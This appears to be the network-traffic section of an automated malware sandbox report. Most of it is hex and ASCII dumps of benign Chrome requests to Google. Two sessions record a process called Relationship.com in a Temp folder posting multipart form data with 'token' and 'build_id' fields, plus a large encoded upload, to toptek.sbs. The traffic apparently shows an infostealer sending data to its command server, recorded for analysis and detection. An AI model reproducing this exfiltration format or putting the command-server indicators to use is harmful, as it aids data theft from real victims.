                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC1390INData Raw: 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 72 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 63 20 67 62 5f 51 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 30 33 64 5c 22 30 20 30 20 32 34 20 32 34 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30
                                                                                                                                                                                                                                                                          Data Ascii: class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u0
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC1390INData Raw: 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 77 64 20 67 62 5f 38 63 20 67 62 5f 39 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 75 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64
                                                                                                                                                                                                                                                                          Data Ascii: 003cdiv class\u003d\"gb_wd gb_8c gb_9c\"\u003e\u003cspan class\u003d\"gb_ud\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_ad\"\u003e \u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC1390INData Raw: 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 44 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 2d 31 31 30 68 2d 32 30 71 2d 31 33 20 30 2d 32 31 2e 35 2d 38 2e 35 54 33 32 30 2d 38 31 30 71 30 2d 31 33 20
                                                                                                                                                                                                                                                                          Data Ascii: ss\u003d\"gb_D\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v-110h-20q-13 0-21.5-8.5T320-810q0-13
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC1390INData Raw: 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c
                                                                                                                                                                                                                                                                          Data Ascii: 1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,20c1.1,0 2,-0.9 2,
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC390INData Raw: 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 32 39 31 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 2c 31 30 32 32 37 38 32 30 35 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 73 2e 67 62 61 72 5f 7c 7c 7b 7d 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 76 61
                                                                                                                                                                                                                                                                          Data Ascii: enu-content","metadata":{"bar_height":60,"experiment_id":[3700291,3700949,3701384,102278205],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthis.gbar_||{};(function(_){va
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC241INData Raw: 65 62 0d 0a 2c 61 2c 62 29 3b 63 6f 6e 73 74 20 65 5c 75 30 30 33 64 61 2e 76 2b 63 3b 61 2e 76 2b 2b 3b 62 2e 64 61 74 61 73 65 74 2e 65 71 69 64 5c 75 30 30 33 64 65 3b 61 2e 42 5b 65 5d 5c 75 30 30 33 64 64 3b 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 62 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 63 2c 64 2c 21 31 29 3a 62 5c 75 30 30 32 36 5c 75 30 30 32 36 62 2e 61 74 74 61 63 68 45 76 65 6e 74 3f 62 2e 61 74 74 61 63 68 45 76 65 6e 74 28 5c 22 6f 6e 5c 22 2b 63 2c 64 29 3a 61 2e 6f 2e 6c 6f 67 28 45 72 72 6f 72 28 5c 22 42 60 5c 22 2b 62 29 29 7d 7d 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: eb,a,b);const e\u003da.v+c;a.v++;b.dataset.eqid\u003de;a.B[e]\u003dd;b\u0026\u0026b.addEventListener?b.addEventListener(c,d,!1):b\u0026\u0026b.attachEvent?b.attachEvent(\"on\"+c,d):a.o.log(Error(\"B`\"+b))}};\n}catch(e){_._DumpException(
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC1390INData Raw: 38 30 30 30 0d 0a 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 79 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 49 20 2e 67 62 5f 41 5c 22 29 2c 7a 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 52 63 5c 22 29 3b 79 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 7a 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 78 64 28 5f 2e 67 64 2c 79 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 5f 2e 41 64 5c 75 30 30 33 64 74 79 70 65 6f 66 20 41 73 79 6e 63 43 6f 6e 74 65 78 74 21 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 75 6e 64
                                                                                                                                                                                                                                                                          Data Ascii: 8000e)}\ntry{\nvar yd\u003ddocument.querySelector(\".gb_I .gb_A\"),zd\u003ddocument.querySelector(\"#gb.gb_Rc\");yd\u0026\u0026!zd\u0026\u0026_.xd(_.gd,yd,\"click\");\n}catch(e){_._DumpException(e)}\ntry{\n_.Ad\u003dtypeof AsyncContext!\u003d\u003d\"und
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC1390INData Raw: 4c 64 28 5f 2e 48 64 3f 5f 2e 48 64 2e 65 6d 70 74 79 48 54 4d 4c 3a 5c 22 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 51 64 2c 64 65 2c 50 64 2c 52 64 2c 57 64 3b 5f 2e 4e 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 3f 61 3a 4e 75 6d 62 65 72 2e 69 73 46 69 6e 69 74 65 28 61 29 3f 61 7c 30 3a 76 6f 69 64 20 30 7d 3b 5f 2e 4f 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 5c 75 30 30 33 64 5c 75 30 30 33 64 6e 75 6c 6c 29 72 65 74 75 72 6e 20 61 3b 69 66 28 74 79 70 65 6f 66 20 61 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 73 74 72 69
                                                                                                                                                                                                                                                                          Data Ascii: Ld(_.Hd?_.Hd.emptyHTML:\"\");\n}catch(e){_._DumpException(e)}\ntry{\nvar Qd,de,Pd,Rd,Wd;_.Nd\u003dfunction(a){return a\u003d\u003dnull?a:Number.isFinite(a)?a|0:void 0};_.Od\u003dfunction(a){if(a\u003d\u003dnull)return a;if(typeof a\u003d\u003d\u003d\"stri
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC1390INData Raw: 20 5f 2e 73 62 28 61 2c 62 2c 63 2c 21 31 29 21 5c 75 30 30 33 64 5c 75 30 30 33 64 76 6f 69 64 20 30 7d 3b 5f 2e 62 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4f 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 53 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 5f 2e 4e 64 28 5f 2e 45 63 28 61 2c 62 29 29 7d 3b 5f 2e 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 62 65 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 63 65 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 72 65 74 75 72 6e 20 5f 2e 74 62 28 5f 2e 53 28 61 2c 62 29 2c 63 29 7d 3b 5f 2e 65 65 5c 75 30 30
                                                                                                                                                                                                                                                                          Data Ascii: _.sb(a,b,c,!1)!\u003d\u003dvoid 0};_.be\u003dfunction(a,b){return _.Od(_.Ec(a,b))};_.S\u003dfunction(a,b){return _.Nd(_.Ec(a,b))};_.T\u003dfunction(a,b,c\u003d0){return _.tb(_.be(a,b),c)};_.ce\u003dfunction(a,b,c\u003d0){return _.tb(_.S(a,b),c)};_.ee\u00


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          11192.168.2.449754142.250.181.684431312C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:50 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC933INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Version: 705503573
                                                                                                                                                                                                                                                                          Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                          Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                          Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                          Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                          Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                          Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:50 GMT
                                                                                                                                                                                                                                                                          Server: gws
                                                                                                                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC35INData Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 1d)]}'{"update":{"promos":{}}}
                                                                                                                                                                                                                                                                          2024-12-22 21:47:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          12192.168.2.44976494.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:54 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----ZCJMOPPPH4EUAIEK6PHL
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 505
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:47:54 UTC505OUTData Raw: 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 5a 43 4a 4d 4f 50 50 50 48 34 45 55 41 49 45 4b 36 50 48 4c 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------ZCJMOPPPH4EUAIEK6PHLContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------ZCJMOPPPH4EUAIEK6PHLCont
                                                                                                                                                                                                                                                                          2024-12-22 21:47:55 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                          Date: Sun, 22 Dec 2024 21:47:55 GMT
                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                          2024-12-22 21:47:55 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                          13192.168.2.44976694.130.188.574437576C:\Users\user\AppData\Local\Temp\523266\Relationship.com
                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----6FUKNYC2NGV3E3OH4ECJ
                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                          Host: toptek.sbs
                                                                                                                                                                                                                                                                          Content-Length: 213453
                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 34 35 36 32 38 64 35 36 35 31 33 31 30 32 61 63 38 31 63 34 63 66 39 39 31 32 32 61 35 31 32 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 36 46 55 4b 4e 59 43 32 4e 47 56 33 45 33 4f 48 34 45 43 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                          Data Ascii: ------6FUKNYC2NGV3E3OH4ECJContent-Disposition: form-data; name="token"a45628d56513102ac81c4cf99122a512------6FUKNYC2NGV3E3OH4ECJContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------6FUKNYC2NGV3E3OH4ECJCont
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC16355OUTData Raw: 41 59 69 43 78 45 41 41 51 59 42 44 51 51 49 41 77 67 49 44 51 67 49 43 41 67 4a 43 41 41 76 5a 58 64 45 74 42 69 33 43 71 41 41 41 41 59 34 6f 47 49 66 43 68 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 77 41 76 5a 58 64 45 74 42 69 33 43 59 41 41 41 41 59 66 43 52 45 41 41 51 59 42 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 67 41 76 5a 58 64 45 74 42 69 33 43 49 41 41 41 41 59 65 43 42 45 41 41 51 59 49 44 51 51 49 43 41 67 49 44 51 67 49 43 41 67 4a 42 51 41 76 5a 58 64 45 74 42 69 33 45 41 41 41 42 69 49 48 45 51 41 42 42 67 45 4e 42 41 67 44 43 41 67 4e 43 41 67 49 43 41 6b 45 41 43 39 6c 5a 51 58 79 48 55 51 47 6f 41 41 41 42 67 50 73 35 42 38 47 45 51 41 42 42 67 45 4e 42 41 67 49 43 41 67 4e 43 41 67 49 43 41 6b 44
                                                                                                                                                                                                                                                                          Data Ascii: AYiCxEAAQYBDQQIAwgIDQgICAgJCAAvZXdEtBi3CqAAAAY4oGIfChEAAQYBDQQICAgIDQgICAgJBwAvZXdEtBi3CYAAAAYfCREAAQYBDQQICAgIDQgICAgJBgAvZXdEtBi3CIAAAAYeCBEAAQYIDQQICAgIDQgICAgJBQAvZXdEtBi3EAAABiIHEQABBgENBAgDCAgNCAgICAkEAC9lZQXyHUQGoAAABgPs5B8GEQABBgENBAgICAgNCAgICAkD
                                                                                                                                                                                                                                                                          2024-12-22 21:47:56 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
